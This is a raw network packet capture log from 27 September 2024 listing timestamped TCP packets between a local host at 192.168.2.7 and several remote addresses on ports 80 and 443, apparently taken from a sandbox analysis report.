Sep 27, 2024 01:38:20.145956993 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.235485077 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.235502958 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.235523939 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.235538006 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.235552073 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.235574007 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.235572100 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.235589981 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.235601902 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.235605001 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.235620022 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.235620975 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.235635996 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.235639095 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.235651016 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.235677004 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.235878944 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.235915899 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.235924006 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.236011982 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.236026049 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.236040115 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.236049891 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.236052990 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.236068010 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.236077070 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.236104012 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.256191015 CEST	443	49745	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:20.256562948 CEST	49745	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:20.257009983 CEST	49745	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:20.257020950 CEST	443	49745	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:20.258588076 CEST	49745	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:20.258594036 CEST	443	49745	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:20.325824022 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.325849056 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.325906038 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.325922966 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.325939894 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.325954914 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.325969934 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.325984001 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.325992107 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.325999022 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.326009989 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.326036930 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.326049089 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.326065063 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.326078892 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.326093912 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.326105118 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.326131105 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.326179981 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.326195955 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.326210022 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.326224089 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.326237917 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.326239109 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.326273918 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.416124105 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.416189909 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.416208982 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.416243076 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.416276932 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.416307926 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.416311026 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.416342020 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.416357994 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.416366100 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.416404009 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.416445017 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.416454077 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.416501045 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.416532993 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.416543007 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.416565895 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.416604996 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.416615009 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.416646957 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.416695118 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.416726112 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.416744947 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.416760921 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.416764975 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.416794062 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.416841984 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.416851044 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.470419884 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.501550913 CEST	443	49746	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:20.501653910 CEST	49746	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:20.503717899 CEST	49746	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:20.503729105 CEST	443	49746	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:20.503979921 CEST	443	49746	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:20.505409002 CEST	49746	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:20.505430937 CEST	49746	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:20.505484104 CEST	443	49746	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:20.506560087 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.506589890 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.506603956 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.506655931 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.506711960 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.506726980 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.506748915 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.506762028 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.506762028 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.506778002 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.506793976 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.506798983 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.506808996 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.506823063 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.506825924 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.506841898 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.506846905 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.506856918 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.506871939 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.506882906 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.506891012 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.506901979 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.507272959 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.507287025 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.507301092 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.507314920 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.507323027 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.507368088 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.507395983 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.507437944 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.597156048 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.597182989 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.597201109 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.597214937 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.597230911 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.597239017 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.597248077 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.597265959 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.597274065 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.597285986 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.597286940 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.597331047 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.597395897 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.597412109 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.597428083 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.597461939 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.597506046 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.597522020 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.597537041 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.597552061 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.597560883 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.597568035 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.597587109 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.597604036 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.597681046 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.597743034 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.597759008 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.597795963 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.597892046 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.597909927 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.597925901 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.597951889 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.597965002 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.687027931 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.687055111 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.687072992 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.687105894 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.687108040 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.687133074 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.687148094 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.687163115 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.687165022 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.687181950 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.687194109 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.687199116 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.687216043 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.687328100 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.687342882 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.687359095 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.687378883 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.687391043 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.687405109 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.687408924 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.687432051 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.687447071 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.687462091 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.687470913 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.687489986 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.687657118 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.687671900 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.687688112 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.687695026 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.687704086 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.687719107 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.687731981 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.687772036 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.687858105 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.736028910 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.777209044 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.777240992 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.777256012 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.777271032 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.777287006 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.777302027 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.777302027 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.777322054 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.777333975 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.777338028 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.777352095 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.777362108 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.777371883 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.777375937 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.777422905 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.777431965 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.777486086 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.777502060 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.777527094 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.777535915 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.777578115 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.777623892 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.777674913 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.777719975 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.777735949 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.777750015 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.777762890 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.777784109 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.777930975 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.777946949 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.777964115 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.777971983 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.777978897 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.777996063 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.778002024 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.778095007 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.778131008 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.869800091 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.869821072 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.869843006 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.869857073 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.869872093 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.869888067 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.869887114 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.869906902 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.869924068 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.869935036 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.870048046 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.870073080 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.870090008 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.870090008 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.870106936 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.870121956 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.870134115 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.870160103 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.870256901 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.870270967 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.870285988 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.870299101 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.870310068 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.870336056 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.870412111 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.870501995 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.870516062 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.870529890 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.870539904 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.870544910 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.870609999 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.870673895 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.870687962 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.870702982 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.870723963 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.870739937 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.952985048 CEST	443	49745	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:20.953083992 CEST	443	49745	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:20.953103065 CEST	49745	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:20.953183889 CEST	49745	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:20.953485012 CEST	49745	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:20.953531027 CEST	443	49745	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:20.956727982 CEST	443	49746	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:20.956851959 CEST	443	49746	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:20.957026005 CEST	49746	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:20.957890034 CEST	49746	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:20.957907915 CEST	443	49746	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:20.957928896 CEST	49746	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:20.957935095 CEST	443	49746	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:20.959801912 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.959887028 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.959933043 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.959958076 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.959963083 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.959995031 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.960021019 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.960021973 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.960052967 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.960084915 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.960103035 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.960110903 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.960128069 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.960145950 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.960175991 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.960184097 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.960208893 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.960253954 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.960254908 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.960285902 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.960314989 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.960329056 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.960345984 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.960376024 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.960419893 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.960464001 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.960493088 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.960536957 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.960542917 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.960567951 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.960581064 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.960603952 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.960635900 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.960654020 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.960665941 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.960695028 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.960707903 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.960736990 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.961591959 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.974803925 CEST	49747	80	192.168.2.7	45.132.206.251
Sep 27, 2024 01:38:20.977644920 CEST	49748	443	192.168.2.7	188.114.97.3
Sep 27, 2024 01:38:20.977670908 CEST	443	49748	188.114.97.3	192.168.2.7
Sep 27, 2024 01:38:20.977791071 CEST	49748	443	192.168.2.7	188.114.97.3
Sep 27, 2024 01:38:20.978205919 CEST	49748	443	192.168.2.7	188.114.97.3
Sep 27, 2024 01:38:20.978220940 CEST	443	49748	188.114.97.3	192.168.2.7
Sep 27, 2024 01:38:20.979605913 CEST	80	49747	45.132.206.251	192.168.2.7
Sep 27, 2024 01:38:20.979964972 CEST	49747	80	192.168.2.7	45.132.206.251
Sep 27, 2024 01:38:20.980112076 CEST	49747	80	192.168.2.7	45.132.206.251
Sep 27, 2024 01:38:20.980485916 CEST	49747	80	192.168.2.7	45.132.206.251
Sep 27, 2024 01:38:20.984842062 CEST	80	49747	45.132.206.251	192.168.2.7
Sep 27, 2024 01:38:20.985304117 CEST	80	49747	45.132.206.251	192.168.2.7
Sep 27, 2024 01:38:20.985320091 CEST	80	49747	45.132.206.251	192.168.2.7
Sep 27, 2024 01:38:20.985332966 CEST	80	49747	45.132.206.251	192.168.2.7
